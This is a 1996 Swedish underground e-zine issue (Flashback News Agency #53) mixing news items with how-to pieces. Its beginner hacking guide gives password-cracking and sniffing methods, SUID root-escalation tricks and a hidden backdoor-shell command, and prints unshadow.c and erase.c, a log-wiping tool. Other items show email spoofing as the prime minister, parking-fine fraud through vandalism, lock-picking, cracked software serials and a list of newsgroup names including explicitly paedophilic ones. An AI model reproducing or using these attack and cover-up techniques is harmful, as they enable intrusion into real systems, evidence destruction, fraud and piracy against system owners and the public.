____________________________________________________________________________
FLASHBACK NEWS AGENCY (FNA) #53
Vol.2 No.35 - 26 Augusti 1996 - Gratis - Email: fna@flashback.se
Antal Prenumeranter: 6337 (+335)
REDAKTÖR: Jan Axelsson
MEDARBETARE (#53): Claun, Erik, E.t., ghost, Hau, J, LordB, Nisseman, Sten
Bumling, TeknoHead, Uffe Puffe
____________________________________________________________________________

Veckans innehåll:

     o Ledare 960826 (J.A.)
     o FNA:s Free Speech tävling II - Augusti 1996 (-)
     o Överraska dina vänner med Email från statsministern (Erik)
     o Tips på hur man slipper P-böter (Sten Bumling)
     o Nybörjarguide för hackers (LordB)
     o Så dyrkas ett slanglås (LordB)
     o Livets Ords hemsida saboterad för tredje gången (J.A.)
     o Windows World tipsar sina läsare om piratkopierade program (Claun)
     o Amerikanska justitiedepartementets hackade hemsida nu upplagd
       på Flashbacks Webhotel (J.A.)
     o Chokladberoende (E.t. & Claun)
     o Feedback (Uffe Puffe)
     o Flashback crackz (ghost & Hau)
     o Barnporr på Internet (J.A.)
     o Ravers bojkottar Denvers MC? (J)
     o När kan polisen kräva blodprov av dig (TeknoHead)
     o Annonsstopp för piratdekodrar (-)
     o Arla fick besök av hackers i söndags (montezuma)
     o PS. - Kolla in (J.A.)

======================================

Ledare 960826:

I förra veckan uppstod en mängd missförstånd. När jag informerade om våra
nya mailinglistor, så trodde folk bl.a. att FNA var en mailinglista. Många
blev även oroliga över att de inte skulle få bli kvar på utskickslistan
osv. Därför kommer här en *kort* redogörelse ang. FNA, FML och FIL.

FNA (Flashback News Agency) är Flashbacks elektroniska veckotidning. Här
informerar vi *alla* som är intresserade om tips, notiser, vad som är på
gång (eller vad som hänt) osv. En nyhetsbyrå med inriktning på i huvudsak
underground. ALLA är välkomna som läsare, oavsett om du hjälper oss med
tips eller ej. Oavsett ifall du hatar eller älskar oss. Kort sagt; FNA är
till för alla. FNA är också gratis. Du behöver m.a.o. inte prenumerera på
Flashback för att få FNA. Det är OK att skicka FNA till vänner, och det är
OK att stjäla artiklar från FNA då vi som bekant inte tror på copyright.
Varför skall någon *äga* information? Vi stjäl från alla (oavsett vad de
tycker) och uppmanar andra att göra samma sak med oss.

FML (Flashback Mailing List) och FIL (Flashback Information List) är två
mailinglistor. En mailinglista är en diskussionslista där deltagarna
*diskuterar* olika ämnen. Om en person gör ett inlägg, så får samtliga på
listan denna persons inlägg. För att deltagarna inte skall drunkna i mail,
så måste antalet personer i listan begränsas. Dessa listor riktar sig
m.a.o. *endast* till de med *mycket god* förankring inom undergroundscenen.
Inga wannabees är välkomna. Här finns heller inte plats för några pubertala
flamewars. De som skriver för att synas åker omedelbart ut. Listan är
*endast* till för de som är en del av scenen. De som vill vara med skall
berätta vad de sysslar med; har du något skivbolag, ger du ut någon
tidning, har du någon hemsida, har du crackat någons hemsida, har du ofta
hembesök av polisen (eller SÄPO), vet du saker som kan *tillföra* listan
något. Endast då är du välkommen.

Vad är då underground. Flashbacks mailinglista har funnits sedan april, och
diskussionerna har handlat om det mesta; satanism, snuff movies, gaykultur,
konst av massmördare, nazism, droger, anarkism, hackers osv. osv. Kort
sagt, det mesta som du hittar i Flashback brukar debatteras.

En bra mailinglista har ett 50-tal deltagare. Detta betyder att mindre än
1% av FNA's deltagare har en chans att få vara med. Men vill du ansöka så
är mitt råd; skicka MYCKET information om dig själv. Har du ingen
anknytning till undergroundscenen, avstå från att ens ansöka. Trösta dig
istället med FNA och Flashback, eller förändra din situation. Se till att
även *du* blir en del av scenen. Lycka till.

Jan Axelsson.

------------------------------

* FNA:S FREE SPEECH TÄVLING II - AUGUSTI 1996

Tipsa FNA med information & vinn fina priser!
I potten denna månad:

* BLACK PHILES.1 + BLACK PHILES.2 (CD-ROM)
  Två fullpackade CD-Rom samlingar med Hacking / Phreaking / Anarchy /
  Drugs / Bombs / UFO's / Occult / Conspiracy / Security / Computers /
  Programming... Totalt över 36000 (trettiosex tusen) filer!!!
  YTTERLIGARE INFO: http://www.algonet.se/~synchron/
  eller: synchron@algonet.se

* DEN SATANISKA BIBELN - ANTON LAVEY (BOK)
  Svensk översättning av satanismens klassiker nummer ett; The Satanic Bible.
  Anton LaVey som 1966 bildade Church of Satan, skrev tre år senare denna
  bestseller som på engelska har sålt över 800.000 exemplar.
  YTTERLIGARE INFO: http://flashback.se/~lookingglass/
  eller: carl@lgc.se

* REALITY - ALLA SPELS VÄRSTING (SPEL)
  Spelet som i höstas orsakade stora rubriker i dagstidningar över hela landet.
  Spelet, påstods det, skulle lära ungdomar att knarka och liknades vid monopol
  för brottslingar m.m. 100% underground! Inget för känsliga personer!
  YTTERLIGARE INFO: http://www.df.lth.se/~beaker/reality.html
  eller: beaker@df.lth.se

* FLASHBACK #2 + FLASHBACK #3 (TIDNING)
  Flashbacks andra och tredje nummer. Slutsålda sedan länge! 152 fullpackade
  A4-sidor. Offsettryck. Ur innehållet: Siewert Öholms rättegångshandlingar
  (där han bl.a. är åtalad för våldtäkt m.m.), Stockholms våldtäktsmän 90/91
  (komplett lista med namn, adresser, tel.nummer och bilder m.m.), Namnen &
  adresserna till de som beställde filmer från barnporrsrättegången, Lista på
  alla filmer som blivit klippta av filmcensuren resp. distributören under
  åren 1978-1993 och mycket, mycket mer. OBS: Samlarvärde!!
  YTTERLIGARE INFO: http://www.flashback.se/  eller: flashback@flashback.se

Det enda du behöver göra är att förse oss med information. Allt från civ.
polisbilar och passwords till skojiga notiser och artiklar. Allt med
undergroundprägel är av STORT intresse!

Om du vill vara med och tävla, så behöver vi följande info:

* DITT NICKNAME.
  I stort sätt alla våra bidragsgivare kräver 100% garanterad anonymitet.
  Därför har de "nicknames" istället. En sort pseudonym. Men vill du ha ditt
  riktiga namn i tidningen, så är givetvis det OK.

* VAD VILL DU HA IFALL DU VINNER?
  Skriv gärna en "topplista". Vi vill givetvis helst ge dig det pris som du
  önskar. Glöm därför inte att informera oss.

SAMTLIGA TIPS SKICKAS TILL: fna@flashback.se

Vinnarna kommer att presenteras i FNA #54. Alla bidragsgivare garanteras
100% anonymitet. Vinner gör den som kommit med bästa bidraget alt. flest
användbara bidrag under månaden. Kort sagt, den som tillfört FNA mest under
Augusti månad.

------------------------------

* ÖVERRASKA DINA VÄNNER MED EMAIL FRÅN STATSMINISTERN

Det är inte varje dag man får Email från Göran Persson, men om du vill att
någon av dina kompisar ska få det, behövs bara en mycket grundläggande
kunskap om hur SMTP fungerar.
  När ett mail sänds över Internet sker nämligen det genom en kedja av
datorer, där var och en loggar in på en annan och berättar om mailet som
ska vidarebefordras. Det finns bara ett krux med detta, att ingen av dessa
datorer använder någon som helst autenticiering, dvs vilken dator som
helst kan logga in på vilken annan dator som helst och skicka brev från
vem som helst till vem man vill. (På senare tid har vissa mailservrar fått
större säkerhet på detta område, så de varnar för att allt inte verkar
rätt.)
  När en dator loggar in på en annan används ett textprotokoll med mycket
enkla kommandon. Det gör att allt man behöver är ett telnetprogram och att
logga in på rätt port hos servern.
  SMTP-porten är alltid nr 25, så för att logga in hos Statsministern är
det bara att skriva
        $ telnet mail.sb.gov.se 25
vid en bashprompt (för Windows/Mac-användare ser det förstås annorlunda
ut).
  Du kommer att mötas av ett meddelande som berättar att regeringens
mailserver är redo att ta emot ett meddelande. Vad du skriver nu är ganska
enkelt:

mail from: "Statsminister Göran Persson" 
rcpt to: din_vän@hennes.adress.se

data

Skriv vad du vill här, till exempel att ... att ... att Göran Persson
gärna skulle vilja ha en date (om det är en tjej du skriver till) (Vid
närmare eftertanke det även skulle gälla för en kille ... :) )

Avsluta med en ensam punkt på en rad:

.

Sedan loggar du ut med

quit

Så enkelt är det att skicka anonyma email till vem som helst från en
valfri avsändare. Eftersom det var Statsrådsberedningens egen mailserver
vi loggade in på är det mycket svårt att spåra denna sortens email.

(Inskickat av: Erik)

------------------------------

* TIPS PÅ HUR MAN SLIPPER P-BÖTER

Här kommer div. tips på förslag för den som vill slippa betala p-böter.

1. Så fort som du finner boten så ska du bege dig till en bensinmack och
leta bensinkvitton som  tidsmässigt överensstämmer med boten. Ta sedan
detta och bege dig till närmsta polisstation. Där du påpekar det
inträffade, att du givetvis har haft soppatorsk och bara gått till macken.
Påpeka att du hade satt upp lapp om det på rutan eller dylikt.

2. Ta en sprayflaska med lämplig färg och spraya över alla skyltar där du
kan se att det råder p-förbud. Detta anmäler du sedan till p-bolaget. Ja,
för du kunde ju inte se att p-förbud rådde. Det funkar faktiskt att spraya
direkt efter boten.

3. Stoppa i konstiga grejjor i p-automatens myntinkast varefter du
anmäler just den/de automaterna som obrukliga till p-bolaget. Ta sedan och
sätt upp lappar på de bilar som också har fått p-böter. Där du förklarar
att automaten/erna är ur funktion och att de också ska anmäla detta för att
få boten avskriven.

4. Kanske det bästa, men du ska ha kontakt med någon person som inte har
några skrupler inför skulder. Denna person skriver du ett leasingavtal med.
Alltså han leasar din bil, för du står ju fortfarande som ägare till den. I
detta fall kan du fullständigt strunta i allt vad p-avgifter heter.

(Inskickat av: Sten Bumling)

------------------------------

* EN NYBÖRJARGUIDE FÖR HACKERS
(eller: Jag går och fiskar (passwords under UNIX))

Denna text innehåller ingen ny eller revolutionerande information.
Den är mest avsedd för nybörjarhackare men även erfarna hackare
kan kanske snappa upp nåt användbart tips.
Som vanligt tar jag inget ansvar för vad folk gör med denna information.

När man loggar in på ett UNIX konto anger man först login och
sedan lösenord. Så här kan det se ut:

login: snorre
password: *******

Lösenordet (password) kan vara upp till 8 tecken (ej å, ä, ö).
90 % av allt nätverkshackande går ut på att fiska lösenord.
Genom åren har hackare kommit på mängder av mer eller mindre
snillrika metoder att komma över dessa lösenord. Det mest
eftertraktade lösenordet är root-lösenordet. Root är
systemadministratörens login. Om man loggar in som root
har man samma rättigheter som sysadmin. Det kallas Root-privilegier
eller root-rättigheter, eventuellt system rättigheter/privilegier
(kvarleva från vax/vms). Att ha root privilegier innebär bl a att man
kan ta bort/lägga till användare från systemet. Man kan se vad alla
gör, döda deras processer, läsa deras e-mail osv osv...

Det finns andra sätt att skaffa sig root privilegier än att komma över
root passwordet, men låt oss börja med password fisket.


Metod 1: /etc/passwd

Alla användare och deras lösenord finns lagrade i filen /etc/passwd.
/etc/passwd är läsbar för ALLA! Dock är systemet inte så huvudlöst som
det kan verka, bara nästan. Användarnas lösenord i /etc/passwd är krypterade.
Krypteringsalgoritmen är känd, men den är inte reversibel.
Det går alltså inte att dekryptera, bara att kryptera.
Loginprogrammet krypterar lösenordet som skrivs in och jämför med
det i /etc/passwd. Vad skaparna av UNIX inte tänkte på är att det
går att gissa lösenord. Man behöver inte försöka logga in om och om
igen heller. Eftersom algoritmen är känd kan man plocka det krypterade
lösenordet från /etc/passwd och sedan prova att kryptera ord från en
ordlista och jämföra med det krypterade lösenordet.
Mängder med ordlistor finns att hämta på bl a
"ftp://ftp.ox.ac.uk/pub/wordlists/". Program som tar en passwd fil och
en ordlista och försöker knäcka lösenord i passwd filen kallas crackers.
Den vanligaste för UNIX är crack. Crack finns att hämta på
"ftp://ftp.cert.org/pub/tools/crack/". Som jag sa så kan sysadmin se
vad du gör. Om han ser att du kör CRACK så kommer han att döda
processen snabbare än du hinner säga BIG JIM och sparka ut dig från
systemet. Om du däremot har LINUX hemma kan du köra det i lugn och ro.
För MSDOS finns t ex Cracker Jack:
"ftp://ftp.fc.net/pub/phrack/underground/misc/jack14.zip".

På nyare system som t ex SOLARIS så är password filen skuggad.
Det innebär att de krypterade lösenorden inte finns i /etc/passwd utan i
nån annan fil, vanligen /etc/shadow. För att läsa /etc/shadow behövs root
rättigheter. Vilken ironi, det var ju det som var målet med password fisket,
att skaffa root rättigheter. En skuggad /etc/passwd känns igen genom att det
är en * eller ett X där det krypterade passwordet brukar stå. Om man lyckas
skaffa sig rooträttigheter mha någon annan metod så kan man återskapa passwd
filen så att den går att köra i t ex crack mha följande C-program:

8<-------------------------------------------->8

/* unshadow.c */
/* kompilera med cc -o unshadow unshadow.c */
#include 
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}

8<-------------------------------------------->8

Kom ihåg att unshadow måste (oftast) köras med rootprivilegier.
Alltså krävs andra metoder att skaffa privilegier.


Metod 2: Sniffa Ethernet

Idealiska förhållanden för att sniffa ethernet är i en skola/företag
med ett lokalt nätverk där DU har tillgång till en PC som är uppkopplad
till nätverket (med nätverkskort, inte modem). I ett lokalt nätverk
används broadcasting, dvs alla paket skickas till alla datorer. När en dator
tar emot ett paket kollar den först huvudet för att se vilken dator paketet
ska till, om paketet är till en annan dator slängs det annars tas resten av
paketet emot. Det går att programmera om nätverkskortet till att ta emot
ALLA paket, oavsett vem adressaten är. Detta läge hos nätverkskortet
kallas promiscous mode. Vissa nya kort är spärrade så att de ej går att
ställa om i promiscous mode men jag har aldrig sett ett sånt, dessutom
räcker det med EN dator som har ett "fungerande" kort för att kunna
sniffa ethernetpaket.
OK, nu behövs ett program som ställer om nätverkskortet i promiscous
mode och loggar det som pågår på LAN:et (Local Area Network).
Det bästa heter NETZHACK och går under MSDOS. NETZHACK finns bl a på:
"ftp://ftp.surfnet.nl/mirror-archive/software/simtel-msdos/pktdrvr/"

För att kunna köra NETZHACK så måste en paket drivrutin installeras först.
Starta PC:n i rent dos läge (ingen dos-prompt). Kör igång NETZHACK,
om ingen paket drivrutin finns installerad så klagar NETZHACK.
Ladda hem en drivrutin från t ex: "ftp://ftp.ftp.com/pub/packetd".
Installera paketdrivrutinen (på t ex 0x060) och kör igång NETZHACK igen.
Som du kanske märker så skickas en MASSA information på LAN:et hela tiden.
Tryck på 5 för att bara övervaka telnet, rlogin, e-mail, ftp.
Det är där det intressanta sker, nu ser du ALLA e-mail som skickas,
alla inloggningar (telnet, rlogin och ftp) över LAN:et.
Nu är det bara vänta på napp (root loggar in).
Om du befinner dig i t ex en datasal så tryck q för att stoppa
screendumpen. Då skrivs informationen bara till loggfilen. Det kan annars
se en aning misstänkt ut när passwords, e-mail och andra skumma
teckenkombinationer strömmar över din skärm :-)
TIPS: sök efter pass i loggen, då hittar du alla ställen där
ett password skrivits in.

Det finns även ethernet sniffare till UNIX men man måste ha
root rättigheter för att köra dem och dessutom kan sysadmin, som vanligt,
se vad du gör . . . NETZHACK är omöjlig att spåra.
Enda sättet du kan åka dit på är att bli tagen på bar gärning,
och då får du skylla dig själv.

Som jag nämnde tidigare finns det metoder att skaffa sig root privilegier
utan tillgång till root passwordet.


METOD 3: SUID program

I UNIX har filer olika rättigheter för läsning, skrivning och exekvering.
Dessa rättigheter kan sättas för ägare, grupp och andra. Se UNIX
manual-sidor för mer info. Ett SUID program har Set User ID bitten satt.
Det innebär att när en användare kör programmet så övertar användaren
ägarens identitet. Ett typiskt SUID program är passwd kommandot.
Med passwd ändrar man sitt lösenord. Det innebär att /etc/passwd filen
ändras av passwd kommandot. Men en vanlig användare får INTE skriva till
/etc/passwd filen. Lösningen är att passwd programmet har SUID bitten satt
och ägs av root. Alltså har man root privilegier när man kör passwd.
Tyvärr försvinner rootprivilegierna när programmet avslutas. Många
hackers har fått SUID program att spåra ur och göra saker som från
början inte var tänkt med dem. Urspårade SUID program är faktiskt
ett av de vanligaste säkerhetsålen i UNIX. Det dyker ständigt upp
nya sådana här hål och gamla täpps igen. För att hålla sig
uppdaterad kan man besöka 8lgm: www.8lgm.org eller någon #hack kanal
på IRC. Räkna bara inte med att folk serverar hålen på ett silverfat,
du bör sitta på ett par själv som du kan tradea med.

Idealet är att få ett SUID root shell, dvs en kommandotolk
med root rättigheter. Om man lyckats skaffa sig root rättigheter kan
man enkelt tillverka ett SUID root shell genom att kopiera en kommandotolk,
t ex /bin/sh, till någon kryptisk plats i filsystemet och sedan ändra
rättighetterna på sh.

Ex. cp /bin/sh /tmp/.backdoor; chmod 4777 /tmp/.backdoor

Detta brukar kallas för en bakdörr (kalla den INTE för .backdoor
som i exemplet!). En bra plats att lägga en bakdörr är i .netscape-cache
eller nån annan katalog som vanligtvis bara innehåller en massa skräp
som ingen orkar rota i. Skapa gärna underkataloger som " .. ".
Det förvillar eftersom ".." är parent directory.
Ex: mkdir "..  "; cd "..  ", glöm inte citations tecknen, annars kommer
du till just parent directory.

Det är inte helt otroligt att någon annan hacker redan har huserat i
ditt system. Sök efter skumma SUID program med "find / -perm -4000 -print"
Nu kommer det upp en massa systemfiler som det kan finnas säkerhetshål i.
Om det finns bakdörrar installerade så dyker även dessa upp
(om du har läsrättigheter till dem). Om något av SUID programmen ägs av
root OCH du har skrivrättigheter till det så är saken klar.
Kopiera bara /bin/sh över SUID programmet. Om du vill vara trevlig kan
du ju först göra en kopia av SUID programmet innan du skriver över det.
Här är ett utdrag ur alt.2600 haq faq om hur roligt man kan ha med suid
program. Haq faq finns bl a på:
"http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq-1.htm"

12. How do I gain root from a suid script or program?

1. Change IFS.

If the program calls any other programs using the system() function call,
you may be able to fool it by
changing IFS.
IFS is the Internal Field Separator that the shell uses to delimit arguments.

If the program contains a line that looks like this:

system("/bin/date")

and you change IFS to '/' the shell will them interpret the proceeding line
as:

bin date

Now, if you have a program of your own in the path called "bin" the suid
program will run your program
instead of
/bin/date.

To change IFS, use this command:

IFS='/';export IFS      # Bourne Shell
setenv IFS '/'          # C Shell
export IFS='/'          # Korn Shell

2. link the script to -i

Create a symbolic link named "-i" to the program. Running "-i" will cause
the interpreter shell (/bin/sh)
to start up
in interactive mode. This only works on suid shell scripts.

Example:

% ln suid.sh -i
% -i
#

3. Exploit a race condition

Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.

Example:

nice -19 suidprog ; ln -s evilprog suidroot

4. Send bad input to the program.

Invoke the name of the program and a separate command on the same command
line.

Example:

suidprog ; id


Som du kanske märkt kräver de flesta av de här metoderna att du
redan har ett konto på maskinen du försöker bringa på knä.
Om jag skulle gå in på remote hackande skulle denna text bli
alldeles för stor, men det finns bra texter om remote hacking där ute.

Om du nu lyckas med någon av ovanstående metoder:
LOGGA ALDRIG IN SOM ROOT OM DU INTE VET EXAKT VAD DU HÅLLER PÅ MED!
Annars kommer du åka dit så det stänker om det.


Sist men inte minst: SOPA IGEN ALLA SPÅR EFTER DIG!

Om du tycker dig ha allt under kontroll och bestämmer dig för att
göra ett hack, lämna inga elektroniska fingeravtryck.
Allt du gör loggas. En del system har skräddarsydda loggar.
I filen /etc/syslog.conf specificeras vad som loggas av loggdaemonen =8-O
syslogd. Nedanstående program suddar bort dig från standardloggarna.

Erase.c är hämtat från haq faq.
Erase tar login som argument, ex: erase opalme

8<-------------------------------------------->8

/* erase.c */
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;

  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}

void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {

     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

     if ((pwd=getpwnam(who))!=NULL) {

        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }

    } else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
    printf("Error.\n");
}

8<-------------------------------------------->8

Om du är sugen på att läsa mer så börja med the haq faq.
"http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq-1.htm"

(Inskickat av: LordB)

------------------------------

* SÅ DYRKAS ETT SLANGLÅS (OM DU T.EX. TAPPAT NYCKELN)

De vanligaste slanglåsen, ABUS, är lyckligtvis också de
enklaste att dyrka. Det finns två typer av nycklar till
ABUS slanglås, höger och vänsternycklar.
Om man håller taggarna på nyckeln uppåt så går det ett spår
antingen till vänster eller till höger på nyckeln. Skaffa en av varje sort,
t ex genom att köpa två slanglås. Dessa två nycklar passar nu de flesta
ABUS slanglås (Alla med runda låskolvar, både med vanlig och med krull-slang).

Själva dyrkningen:
För in nyckeln till hälften i låset.
Vrid nyckeln omväxlande till höger och vänster så snabbt som möjligt.
För samtidigt långsamt in nyckeln ett hack i taget.
Om nyckeln nått botten och låset fortfarande inte gått upp så fortsätt
att vrida och för långsamt ut nyckeln till hälften igen.
Upprepa detta ett par gånger in och ut. Gör sedan likadant med den andra
nyckeln. Ofta går det bara att få in den ena nyckeln i låset.
Vridningen måste gå mycket snabbt, det gäller att få in det rätta
"darret" i handleden. Detta kan kräva en del övning.
Ibland kan det även funka att ruska hej vilt både in, ut, höger och vänster.
Akta så inte nyckeln går sönder bara.

Av någon anledning fungerar det bättre med begagnade nycklar än helt nya.
Om en nyckel fungerar dåligt kan man alltid fila lite på taggarna. Det
brukar göra susen.

Fysiskt våld

Om man inte får upp låset med ovanstående metod och inte drar sig
för att förstöra låset kan man alltid forcera låset med fysiskt våld.

Plåtsax:
Finns både i otymplig vaktmästarvariant och behändig handvariant.
Klipp helt enkelt sönder låset. Klipp INTE på kabeln utan klipp i
den mjuka metallen vid låskolven.

TaeKwonDo:
Sparka upp låset. Låt en kompis hålla i cykeln och låset.
Sparka med fotsulan rakt mot låskolven så att kraften forcerar upp låset.
Detta fungerar på alla slanglås. Det är förvånande att se vilka veka
cykellås som tillverkas i Sverige idag.

Riktigt gamla slanglås går det faktiskt att vrida upp. Detta
är ett vida känt trick, men fungerar bara om låset är riktigt gammalt.

(Inskickat av: LordB)

------------------------------

* LIVETS ORDS HEMSIDA SABOTERAD FÖR TREDJE GÅNGEN

Livets Ord har återigen haft påhälsning av hackers. Detta var tredje gången
på mindre än två veckor. Denna gång (i torsdags) ändrades sidan till att ha
ett smurf-tema, och högst upp stod det; "Vakna UPP! Lämna församlingen
Dödens Ord. Don't be a robot, use your OWN mind". På sidan fanns också
länkar till de två första hacken ("http://flashback.se/~doden/" och
"http://flashback.se/~doden2/").

För den som missade den hackade sidan, så finns den nu på Flashbacks
Webhotel: http://flashback.se/~doden3/

------------------------------

* WINDOWS WORLD TIPSAR SINA LÄSARE OM PIRATKOPIERADE PROGRAM.

I senaste numret av Windows World kan man läsa:
"Den som vill ha tag på billiga upplagor av olika operativsystem och
program kan numera bege sig utomlands och handla. Och på köpet tjäna
ordrentligt på affären! Föutsatt att man inte bryr sig det minsta om vad
som är lagligt, förstås...."

Vidare i artikeln berättar dom att dessa skivor säljs på vanliga marknader
i bl.a. S:t Petersburg för omkring 50 kronor styck.

Ännu billigare är det i Kina där liknande program kostar runt $2 st.

(Inskickat av: Claun)

------------------------------

* AMERIKANSKA JUSTITIEDEPARTEMENTETS HACKADE HEMSIDA NU UPPLAGD PÅ
FLASHBACKS WEBHOTEL

I förra veckans FNA berättade vi att några hackers har tagit sig in på det
amerikanska justitiedepartementets hemsida, och ersatt den amerikanska
flaggan med en hakkorsflagga samt utsett Adolf Hitler till justitieminister
m.m.
Nu finns den kompletta "US (Japan's) Department of Injustice Home Page"
(som den hade döpts om till) även på Flashbacks Webhotel.
URL: http://flashback.se/~doj/

------------------------------

* CHOKLADBEROENDE

Kakao innehåller tre ämnen med verkningar liknande hasch, har forskare vid
nervforskningsinstitutet i San Diego i USA funnit. Det rör sig om
anandamid, som ger en känsla av välbefinnande, och ytterligare två ämnen
som förstärker det förstnämdas effekt, skriver tidskriften Nature

(Inskickat av: E.t. & Claun / källa: TT)

------------------------------

* FEEDBACK

Under denna rubrik så kommer vi att publicera läsarbrev och rättelser från
er läsare.

Läsarbrev.1:
Jag läste om tricket med ERI 337;an och att men skulle få en ny lur.
Sannolikt får man ej en ny lur eftersom man på Service verkstaden på bara
någon minut kan uppdatera till en nyare prg-vara som fungerar. Men detta är
dock kostnadsfritt om det är fel på den tidigare.
En telefon det finn roligare buggar i är dock Siemens S4 där det är
felstavat på flera ställen i prg. Testa t ex att starta telefonen utan att
ha sim-kortet i. Det roliga är dock att det inte finns någon uppgradering
som tar bort dessa buggar utan här kan det bli tal om att häva köpet. Om
man nu har den läggningen att man (över?) reagerar för strunt saker.

(Inskickat av: Uffe Puffe)

------------------------------

* FLASHBACK CRACKZ

Här kommer lite nya crackade serienummer som är speciellt gjorda för FNA's
läsare. Observera att username i samtliga program nedan är "Flashback"
(eller dyl.). Har du fler bidrag, så skicka dem till: fna@flashback.se.

CD Wizzard
Name: Flash
Reg.nr: 8813

Gold Wave 3.0+
First name: Flash
Last name: Back
Reg.nr: LQPYLBB

NTcrt v.1.0 b6
Name: Flashback
Company: Flashback
Serial nr: 00-00-000000
Expiration: 01-01-2000
Key: DOFBMU7E40GOMEBVARM94A5LSMNIQKUN

WinPack 32 d
Dealer key: Flashback
Name: Flashback
Reg.nr: FU210000U6N10000

WinPGP 4.0
First name: Flash
Last name:  Back
Reg.nr: 175973110

WinImage:
Namn: Flashback
Nummer: 1EEB31D

Usurper:
Namn: Flashback
BBS namn: Flashback
Nummer: 5384516

WinARJ
Namn: Flashback
Nummer: 154080

NetTerm 2.8
Namn: Flashback
Nummer: 9593i7f9

(Inskickade av: ghost & Hau)

------------------------------

* BARNPORR PÅ INTERNET

"Rädda Barnen" letar barnporr på Internet, och har nu därför sammanställt
en lista över de nyhetsgrupper där möjligheten till att stöta på detta
finns.

alt.binaries.pictures.boys
alt.binaries.pictures.child.erotica.female
alt.binaries.pictures.child.erotica.male
alt.binaries.pictures.children
alt.binaries.pictures.erotic.children
alt.binaries.pictures.erotica child
alt.binaries.pictures.erotica.child.female
alt.binaries.pictures.erotica.child.male
alt.binaries.pictures.erotica.children
alt.binaries.pictures.erotica.lolita
alt.binaries.pictures.erotica.pre-teen
alt.binaries.pictures.erotica.teen.fuck
alt.binaries.pictures.erotica.young
alt.binaries.pictures.lolita.fucking
alt.binaries.pictures.lolita.misc
alt.sex.boys
alt.sex.children
alt.sex.fetish.tinygirls
alt.sex.girls
alt.sex.incest
alt.sex.intergen
alt.sex.pedophile.mike-labbe
alt.sex.pedophilia.
alt.sex.pedophilia.boys
alt.sex.pedophilia.girls
alt.sex.pedophilia.swaps
alt.sex.pedophilia.pictures
alt.sex.pre-teens
alt.sex.teens
alt.sex.weight-gain
alt.fan.cock-sucking
alt.binaries.pictures.voyeurism
alt.binaries.pictures.lolita.fucking
alt.binaries.pictures.erotica.voyeurism
alt.binaries.pictures.erotica.young
alt.binaries.pictures.erotica.uniform
alt.binaries.pictures.erotica.urine
alt.binaries.pictures.erotica.teen.fuck
alt.binaries.pictures.erotica.uncut
alt.binaries.pictures.erotica.spanking
alt.binaries.pictures.erotica.teen.female.masturbation
alt.binaries.pictures.erotica.pornstars
alt.binaries.pictures.erotica.pre-teen
alt.binaries.pictures.erotica.oral
alt.binaries.fetish.scat
alt.binaries.pictures.erotic.anime
alt.binaries.pictures.erotic.centerfolds
alt.binaries.pictures.erotic.senior-citizens
alt.binaries.pictures.erotica.animals
alt.binaries.pictures.erotica.art.pin-up
alt.binaries.pictures.erotica.breasts.small
alt.binaries.pictures.erotica.butts
alt.binaries.pictures.erotica.cheerleaders
alt.binaries.pictures.erotica.disney
alt.binaries.pictures.erotica.fetish.feet
alt.binaries.pictures.erotica.fetish.hair
alt.binaries.pictures.erotic.senior-citizens alt.binaries.pictures.erotica.teen
alt.binaries.pictures.erotica.male.anal
alt.sex.pedophile.mike-labbe
alt.sex.masturbation
alt.sex.fetish.tickling
alt.sex.fetish.waifs
alt.sex.fetish.watersports
alt.sex.fetish.wrestling
alt.sex.first-time
alt.sex.fetish.girl.watchers
alt.sex.homosexual
alt.sex.incest
alt.sex.intergen
alt.sex.jp
alt.sex.magazines
alt.sex.masturbation
alt.sex.movies
alt.sex.necrophilia
alt.sex.pedophilia
alt.sex.pictures
alt.sex.pictures.female
alt.sex.pictures.male
alt.sex.services
alt.sex.spam
alt.sex.spanking
alt.sex.stories
alt.sex.strip-clubs
alt.magazines.pornographic
alt.magick.sex
alt.personals.spanking.punishment
alt.sex.
alt.sex.anal
alt.sex.bestiality
alt.sex.bondage
alt.sex.breast
alt.sex.enemas
alt.sex.exhibitionism
alt.sex.fat
alt.sex.fetish.diapers
alt.sex.fetish.fa
alt.sex.fetish.feet
alt.sex.fetish.hair
alt.sex.fetish.orientals
alt.binaries.multimedia.erotica
alt.binaries.pictures.boys
alt.binaries.pictures.children
alt.binaries.pictures.erotica
alt.binaries.pictures.erotica.amateur.d
alt.binaries.pictures.amateur.female
alt.binaries.pictures.amateur.male
alt.binaries.pictures.erotica.anime
